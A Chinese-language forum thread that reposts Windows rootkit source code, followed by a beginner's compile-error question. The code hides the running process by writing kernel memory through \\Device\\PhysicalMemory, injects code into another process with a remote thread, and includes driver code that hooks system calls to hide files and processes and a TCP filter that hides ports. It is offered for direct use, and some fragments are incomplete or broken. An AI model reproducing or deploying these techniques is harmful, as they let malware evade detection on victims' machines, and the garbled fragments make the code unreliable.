信息来源：http://blog.csdn.net/uoyevoli/services/trackbacks/386210.aspx

头文件：

//////////////////////////////////////
//HideProcess.h
BOOL HideProcess();



CPP源文件：
/////////////////////////////////////////////////////////////////////////////
//HideProcess.cpp
#include<windows.h>
#include<Accctrl.h>
#include<Aclapi.h>

#include"HideProcess.h"

#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;

typedef struct _IO_STATUS_BLOCK
{
   NTSTATUS Status;
   ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING
{
   USHORT Length;
   USHORT MaximumLength;
   PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT           0x00000002L
#define OBJ_PERMANENT        0x00000010L
#define OBJ_EXCLUSIVE        0x00000020L
#define OBJ_CASE_INSENSITIVE   0x00000040L
#define OBJ_OPENIF           0x00000080L
#define OBJ_OPENLINK        0x00000100L
#define OBJ_KERNEL_HANDLE      0x00000200L
#define OBJ_VALID_ATTRIBUTES   0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
   ULONG Length;
   HANDLE RootDirectory;
   PUNICODE_STRING ObjectName;
   ULONG Attributes;
   PVOID SecurityDescriptor;
   PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
   OUT PHANDLE SectionHandle,
   IN ACCESS_MASK DesiredAccess,
   IN POBJECT_ATTRIBUTES ObjectAttributes
   );

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
   IN OUT PUNICODE_STRING DestinationString,
   IN PCWSTR SourceString
   );

RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------
BOOL InitNTDLL()
{
   g_hNtDLL = LoadLibrary("ntdll.dll");

   if (NULL == g_hNtDLL)
      return FALSE;

   RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,

"RtlInitUnicodeString");
   ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");

   return TRUE;
}
//---------------------------------------------------------------------------
VOID CloseNTDLL()
{
   if(NULL != g_hNtDLL)
      FreeLibrary(g_hNtDLL);

   g_hNtDLL = NULL;
}
//---------------------------------------------------------------------------
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
   PACL pDacl              = NULL;
   PSECURITY_DESCRIPTOR pSD   = NULL;
   PACL pNewDacl = NULL;
   
   DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,

NULL, &pDacl, NULL, &pSD);

   if(ERROR_SUCCESS != dwRes)
   {

   if(pSD)
      LocalFree(pSD);
   if(pNewDacl)
      LocalFree(pNewDacl);
   }

   EXPLICIT_ACCESS ea;
   RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
   ea.grfAccessPermissions = SECTION_MAP_WRITE;
   ea.grfAccessMode = GRANT_ACCESS;
   ea.grfInheritance= NO_INHERITANCE;
   ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
   ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
   ea.Trustee.ptstrName = "CURRENT_USER";

   dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
   
   if(ERROR_SUCCESS != dwRes)
   {

   if(pSD)
      LocalFree(pSD);
   if(pNewDacl)
      LocalFree(pNewDacl);
   }
   dwRes = SetSecurityInfo

(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);
   
   if(ERROR_SUCCESS != dwRes)
   {

   if(pSD)
      LocalFree(pSD);
   if(pNewDacl)
      LocalFree(pNewDacl);
   }

}
//---------------------------------------------------------------------------
HANDLE OpenPhysicalMemory()
{
   NTSTATUS status;
   UNICODE_STRING physmemString;
   OBJECT_ATTRIBUTES attributes;
   ULONG PhyDirectory;

   g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
   GetVersionEx (&g_osvi);

   if (5 != g_osvi.dwMajorVersion)
      return NULL;

   switch(g_osvi.dwMinorVersion)
   {
      case 0:
        PhyDirectory = 0x30000;
        break; //2k
      case 1:
        PhyDirectory = 0x39000;
        break; //xp
      default:
        return NULL;
   }

   RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");

   attributes.Length              = sizeof(OBJECT_ATTRIBUTES);
   attributes.RootDirectory        = NULL;
   attributes.ObjectName           = &physmemString;
   attributes.Attributes           = 0;
   attributes.SecurityDescriptor      = NULL;
   attributes.SecurityQualityOfService   = NULL;

   status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);

   if(status == STATUS_ACCESS_DENIED)
   {
      status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
      SetPhyscialMemorySectionCanBeWrited(g_hMPM);
      CloseHandle(g_hMPM);
      status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
   }

   if(!NT_SUCCESS(status))
      return NULL;

   g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,

0x1000);

   if( g_pMapPhysicalMemory == NULL )
      return NULL;

   return g_hMPM;
}
//---------------------------------------------------------------------------
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
   ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
   PGDE = BaseAddress[VAddr>>22];

   if (0 == (PGDE&1))
      return 0;

   ULONG tmp = PGDE & 0x00000080;

   if (0 != tmp)
   {
      PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
   }
   else
   {
      PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
      PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
      
      if (0 == (PTE&1))
        return 0;

      PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
      UnmapViewOfFile((PVOID)PGDE);
   }

   return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
ULONG GetData(PVOID addr)
{
   ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
   PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &

0xfffff000, 0x1000);
   
   if (0 == tmp)
      return 0;

   ULONG ret = tmp[(phys & 0xFFF)>>2];
   UnmapViewOfFile(tmp);

   return ret;
}
//---------------------------------------------------------------------------
BOOL SetData(PVOID addr,ULONG data)
{
   ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
   PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);

   if (0 == tmp)
      return FALSE;

   tmp[(phys & 0xFFF)>>2] = data;
   UnmapViewOfFile(tmp);

   return TRUE;
}
//---------------------------------------------------------------------------
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
  ExitProcess(0);
  return 1 ;
}
//---------------------------------------------------------------------------
BOOL YHideProcess()
{
//   SetUnhandledExceptionFilter(exeception);

   if (FALSE == InitNTDLL())
      return FALSE;

   if (0 == OpenPhysicalMemory())
      return FALSE;

   ULONG thread  = GetData((PVOID)0xFFDFF124); //kteb
   ULONG process = GetData(PVOID(thread + 0x44)); //kpeb

   ULONG fw, bw;
   if (0 == g_osvi.dwMinorVersion)
   {
      fw = GetData(PVOID(process + 0xa0));
      bw = GetData(PVOID(process + 0xa4));      
   }

   if (1 == g_osvi.dwMinorVersion)
   {
      fw = GetData(PVOID(process + 0x88));
      bw = GetData(PVOID(process + 0x8c));
   }
      
   SetData(PVOID(fw + 4), bw);
   SetData(PVOID(bw), fw);

   CloseHandle(g_hMPM);
   CloseNTDLL();

   return TRUE;
}

BOOL HideProcess()
{
static BOOL b_hide = false;
if (!b_hide)
{
  b_hide = true;
  YHideProcess();
  return true;
}
return true;
}


然后在需要隐藏进程的时候#incoude"HideProcess.h",调用HideProcess()即可。

看我远程注入~~~hoho~~~

复制内容到剪贴板

代码:

/
// @Name:        ThreadInject
// @Author:        luoluo
// @Time:        2005-04-17
// @Param:        pid spacifies the pid of the process to be thread injected
// @Ret:        if success return TRUE else return FALSE
//
BOOL WINAPI ThreadInject(DWORD pId)
{   
    HANDLE                        hProcess;
    LPVOID                        lpCodeMemory;
    BOOL                        bRet = FALSE;
    BOOL                        bRetVal;
    RemotePara                    myRemotePara;
    PRemotePara                    pRemotePara;
    HANDLE                        hThread;
    DWORD                        dwByteWrite;
    HANDLE                        hToken;
    TOKEN_PRIVILEGES            tkp;
    MEMORY_BASIC_INFORMATION    mbi;
    SIZE_T                        szRet;
    DWORD                        dwOldProtect;

    // Open process token to ajust privileges
    bRetVal = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);

    if (! bRetVal)
    {
        //MessageBox(NULL, "failed OpenProcessToken", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    // Get the LUID for debug privilege
    bRetVal = LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid);

    if (! bRetVal)
    {
        //MessageBox(NULL, "failed LookupPrivilegeValue", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    // Adjust token privileges
    bRetVal = AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(&tkp), (PTOKEN_PRIVILEGES)NULL, 0);
    if (! bRetVal)
    {
        //MessageBox(NULL, "failed AdjustTokenPrivileges", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    // Open remote process
    hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, FALSE, pId);
    if (hProcess == NULL)
    {
        //MessageBox(NULL, "failed OpenProcess", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    // Allocate memory from remote process
    lpCodeMemory = VirtualAllocEx(hProcess, NULL, THREADSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (lpCodeMemory == NULL)
    {
        //MessageBox(NULL, "failed VirtualAllocEx", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    // Query the page information
    ZeroMemory(&mbi, sizeof(MEMORY_BASIC_INFORMATION));
    szRet = VirtualQueryEx(hProcess, lpCodeMemory, &mbi, sizeof(MEMORY_BASIC_INFORMATION));
    if (szRet == 0)
    {
        //MessageBox(NULL, "failed VirtualQueryEx", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    // Modify the page protection for write
    bRetVal = VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_EXECUTE_READWRITE, &mbi.Protect);
    if (! bRetVal)
    {
        //MessageBox(NULL, "failed VirtualProtectEx", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    // Write my code to remote process memory
    bRetVal = WriteProcessMemory(hProcess, lpCodeMemory, &ThreadProc, THREADSIZE, 0);
    if (! bRetVal)
    {
        //MessageBox(NULL, "failed WriteProcessMemory", "Error", MB_ICONERROR);
        VirtualFreeEx(hProcess, lpCodeMemory, THREADSIZE, MEM_RELEASE);
        goto FreeAndExit;
    }

    // Modify the page protection to protect
    bRetVal = VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);
    if (! bRetVal)
    {
        //MessageBox(NULL, "failed VirtualProtectEx 2", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    // Fill in the parameter
    ZeroMemory(&myRemotePara, sizeof(RemotePara));
    CreateParameter((PRemotePara)&myRemotePara);

    // Allocate memory in the remote process to store the parameter
    pRemotePara = (PRemotePara)VirtualAllocEx(hProcess, NULL, sizeof(RemotePara), MEM_COMMIT, PAGE_READWRITE);
    if (pRemotePara == NULL)
    {
        //MessageBox(NULL, "failed VirtualAllocEx", "Error", MB_ICONERROR);
        VirtualFreeEx(hProcess, lpCodeMemory, THREADSIZE, MEM_RELEASE);
        goto FreeAndExit;
    }

    // Query page information
    ZeroMemory(&mbi, sizeof(MEMORY_BASIC_INFORMATION));
    szRet = VirtualQueryEx(hProcess, pRemotePara, &mbi, sizeof(MEMORY_BASIC_INFORMATION));
    if (szRet == 0)
        goto FreeAndExit;

    // Modify page protection for write
    bRetVal = VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect);
    if (! bRetVal)
        goto FreeAndExit;

    // Write para to the remote process's memory
    bRetVal = WriteProcessMemory(hProcess, pRemotePara, &myRemotePara, sizeof(myRemotePara), 0);
    if (! bRetVal)
    {
        //MessageBox(NULL, "failed WriteProcessMemory", "Error", MB_ICONERROR);
        VirtualFreeEx(hProcess, lpCodeMemory, THREADSIZE, MEM_RELEASE);
        VirtualFreeEx(hProcess, pRemotePara, sizeof(RemotePara), MEM_RELEASE);
        goto FreeAndExit;
    }

    // Modify page protection to protect
    bRetVal = VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);
    if (! bRetVal)
        goto FreeAndExit;

    // Create remote thread
    hThread = CreateRemoteThread(hProcess, 0, 0, lpCodeMemory, pRemotePara, 0, &dwByteWrite);
    if (hThread == NULL)
    {
        //MessageBox(NULL, "failed CreateRemoteThread", "Error", MB_ICONERROR);
        VirtualFreeEx(hProcess, lpCodeMemory, THREADSIZE, MEM_RELEASE);
        VirtualFreeEx(hProcess, pRemotePara, sizeof(RemotePara), MEM_RELEASE);
        goto FreeAndExit;
    }

    bRet = TRUE;

FreeAndExit:
    if (hProcess != NULL)    CloseHandle(hProcess);
    if (hToken != NULL) CloseHandle(hToken);

    return bRet;
}

DRIVE 中隐藏任意进程，目录/文件，注册表，端口
Author: sinister
Email: sinister@whitecell.org
Homepagehttp://www.whitecell.org
Date: 2002-05-08

查找进程，目录/文件，注册表等操作系统将最终调用 ZwQueryDirectoryFile，ZwQuerySystemInformation，
ZwXXXvalueKey 等函数。要想拦截这些函数达到隐藏目的，需先自己实现以上函数，并修改系统维护的一个
SYSCALL 表使之指向自己预先定义的函数。因 SYSCALL 表在用户层不可见，所以要写 DRIVE 在 RING 0 下
才可修改。关于如何修改已有文章详细介绍过，这里不在详述。（可以参见 sysinternals.com 或 WebCrazy 所
写的文章）。查找端口用的是 TDI 查询。TDI 导出了两个设备 \\Device\\Tcp 与 \\Device\\Udp。我们可以利
用设备过滤驱动的方法写一个 DRIVE 把这两个设备的所有 IRP 包接管过来进行处理后再传给下层驱动。以达到
隐藏任意端口的目的。上述提到的方法不是新东西，是在N年前就已经有的老技术。俺现在将它贴出来只不过为了
充实下版面，灌灌水罢了。高手们还是别看了。下面是我 DRIVE 中隐藏任意进程，目录/文件，端口代码片段。
（注册表操作在 RegMon 中写的很详细，这里就不列出了）




typedef struct _FILETIME
{
DWORD dwLowDateTime;
DWORD dwHighDateTime;
} FILETIME;



typedef struct _DirEntry
{
DWORD dwLenToNext;
DWORD dwAttr;
FILETIME ftCreate, ftLastAccess, ftLastWrite;
DWORD dwUnknown[ 2 ];
DWORD dwFileSizeLow;
DWORD dwFileSizeHigh;
DWORD dwUnknown2[ 3 ];
WORD wNameLen;
WORD wUnknown;
DWORD dwUnknown3;
WORD wShortNameLen;
WCHAR swShortName[ 12 ];
WCHAR suName[ 1 ];
} DirEntry, *PDirEntry;



struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};



struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
struct _SYSTEM_THREADS Threads[1];
};




// 隐藏目录/文件



NTSTATUS HookZwQueryDirectoryFile(
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery)
{
NTSTATUS rc;
CHAR aProcessName[80];
ANSI_STRING ansiFileName,ansiDirName;
UNICODE_STRING uniFileName;
PP_DIR ptr;



WCHAR ParentDirectory[1024] = {0};
int BytesReturned;
PVOID Object;




// 执行旧的ZwQueryDirectoryFile函数
rc = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile))(
hFile,
hEvent,
IoApcRoutine,
IoApcContext,
pIoStatusBlock,
FileInformationBuffer,
FileInformationBufferLength,
FileInfoClass,
bReturnOnlyOneEntry,
PathMask,
bRestartQuery);

if(NT_SUCCESS(rc))
{
PDirEntry p;
PDirEntry pLast;
BOOL bLastOne;
int found;
p = (PDirEntry)FileInformationBuffer; // 将查找出来结果赋给结构
pLast = NULL;

do
{
bLastOne = !( p->dwLenToNext );
RtlInitUnicodeString(&uniFileName,p->suName);
RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE);
RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE);
RtlUpperString(&ansiFileName,&ansiDirName);



found=0;

// 在链表中查找是否包含当前目录
for(ptr = list_head; ptr != NULL; ptr = ptr->next)
{
if (ptr->flag != PTR_HIDEDIR) continue;
if( RtlCompareMemory( ansiFileName.Buffer, ptr->name,strlen(ptr->name) ) == strlen(ptr->name))
{
found=1;
break;
}
}//end for



// 如果链表中包含当前目录，隐藏
if(found)
{
if(bLastOne)
{
if(p == (PDirEntry)FileInformationBuffer )
{
rc = 0x80000006; //隐藏
}
else
pLast->dwLenToNext = 0;
break;
}
else
{
int iPos = ((ULONG)p) - (ULONG)FileInformationBuffer;
int iLeft = (DWORD)FileInformationBufferLength - iPos - p->dwLenToNext;
RtlCopyMemory( (PVOID)p, (PVOID)( (char *)p + p->dwLenToNext ), (DWORD)iLeft );
continue;
}
}
pLast = p;
p = (PDirEntry)((char *)p + p->dwLenToNext );
}while( !bLastOne );
RtlFreeAnsiString(&ansiDirName);
RtlFreeAnsiString(&ansiFileName);
}
return(rc);
}



// 隐藏进程



NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS rc;



ANSI_STRING process_name,process_uname,process_name1,process_name2;
BOOL g_hide_proc = TRUE;
CHAR aProcessName[80];
PP_DIR ptr;
int found;




// 执行旧的ZwQuerySystemInformation函数



rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength );



if(NT_SUCCESS(rc ))
{
if( g_hide_proc && (5 == SystemInformationClass))
{
// 将查找出来结果赋给结构
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;



// 遍历进程
while(curr)
{

if((0 < process_name.Length) && (255 > process_name.Length))
{
found=0;
// 遍历链表
for (ptr=list_head;ptr!=NULL;ptr=ptr->next )
{
if (ptr->flag != PTR_HIDEPROC) continue ;

if (memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0)
{
found =1;
}
}

// 判断如果是隐藏进程名则覆盖掉此进程名
while(found)
{



if(prev)
{
if(curr->NextEntryDelta)
{
prev->NextEntryDelta += curr->NextEntryDelta;
}
else
{
prev->NextEntryDelta = 0;
}
}
else
{
if(curr->NextEntryDelta)
{
(char *)SystemInformation += curr->NextEntryDelta;
}
else
{
SystemInformation = NULL;
}
}

if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
else
{
curr = NULL;break;
}
// 遍历链表
found = 0;
for (ptr=list_head;ptr!=NULL;ptr=ptr->next )
{
if (ptr->flag != PTR_HIDEPROC) continue ;

if (memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0)
{
found = 1;
}
}
}
}
if(curr != NULL)
{
prev = curr;
if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
else curr = NULL;
}
}
}
}
return(rc);
}




//隐藏端口



PDEVICE_OBJECT m_TcpgetDevice;



PDEVICE_OBJECT TcpDevice;
UNICODE_STRING TcpDeviceName;
PDRIVER_OBJECT TcpDriver;
PDEVICE_OBJECT TcpgetDevice;
PDEVICE_OBJECT FilterDevice
PDRIVER_DISPATCH Empty;
NTSTATUS status;



Empty = DriverObject->MajorFunction[IRP_MJ_CREATE];

RtlInitUnicodeString( &TcpDeviceName, L"\\Device\\Tcp");



//得到已有的设备指针



status = IoGetDeviceObjectPointer( &TcpDeviceName,
FILE_ALL_ACCESS,
&FileObject,
&TcpDevice
);




if(!NT_SUCCESS(status))
{
DbgPrint("IoGetDeviceObjectPointer error!\n");
return status;
}



DbgPrint("IoGetDeviceObjectPointer ok!\n");

// 建立设备
status = IoCreateDevice( DriverObject,
sizeof(DEVICE_EXTENSION),
NULL,
FILE_DEVICE_UNKNOWN,
0,
FALSE,
&FilterDevice
);
if(!NT_SUCCESS(status))
{
return status;
}



// 加入设备



TcpgetDevice = IoAttachDeviceToDeviceStack( FilterDevice, TcpDevice);



if(!TcpgetDevice)
{
IoDeleteDevice(FilterDevice);
DbgPrint("IoAttachDeviceToDeviceStack error!\n");
return STATUS_SUCCESS;
}



m_TcpgetDevice = TcpgetDevice;

// 加到过滤函数中处理
for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++)
{
if((TcpDriver->MajorFunction!=Empty)&&(DriverObject->MajorFunction==Empty))
{
DriverObject->MajorFunction = PassThrough;

}
}



ObDereferenceObject(FileObject);




NTSTATUS PassThrough( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{



NTSTATUS status;
PIO_STACK_LOCATION pIrpStack;



pIrpStack = IoGetCurrentIrpStackLocation( Irp );




//如是查询则完成 IRP
if ( pIrpStack->Parameters.DeviceIoControl.IoControlCode == QUERY_INFORMATION_EX)
{
//这里可以近一步判断某个端口



Irp->IoStatus.Status=STATUS_SUCCESS;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS;
}



//复制当前 IRP
IoCopyCurrentIrpStackLocationToNext(Irp);

IoSetCompletionRoutine( Irp,
GenericCompletion,
NULL,
TRUE,
TRUE,
TRUE
);



//传递
return IoCallDriver( m_TcpgetDevice, Irp);

// 遍历进程
while(curr)
{

if((0 < process_name.Length) && (255 > process_name.Length))
{
found=0;


是这段吧?  你的注视写的让我这种新手感觉比较无奈~

--------------------Configuration: console - Win32 Debug--------------------
Compiling...
console.cpp
e:\me\vc6\console\console.cpp(1) : fatal error C1083: Cannot open include file: &#39;stdafx.h&#39;: No such file or directory
Error executing cl.exe.

console.exe - 1 error(s), 0 warning(s)


在VC++6.0下运行
出现这样的错误是因为什么啊?
那位大哥帮帮忙解决一下啊

#include<windows.h>
应该改成#include“stdafx.h”